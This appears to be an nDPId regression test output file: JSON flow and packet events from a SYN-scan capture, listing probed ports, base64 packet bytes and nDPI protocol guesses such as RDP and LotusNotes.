+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAssGQAACgGcA6sEAAIQA2GNIzTCDfdU4MZAAAAAGACBAAsVQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsGsUAADQG+a2sEAAIQA2GNIzTBETdU4MZAAAAAGACBAAwSAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsALEAADsGDMKsEAAIQA2GNIzTE4rdU4MZAAAAAGACEAAVAgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAs5sAAACYGO7KsEAAIQA2GNIzTE4bdU4MZAAAAAGACDAAZBgAAAgQFtA=="} 
+00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
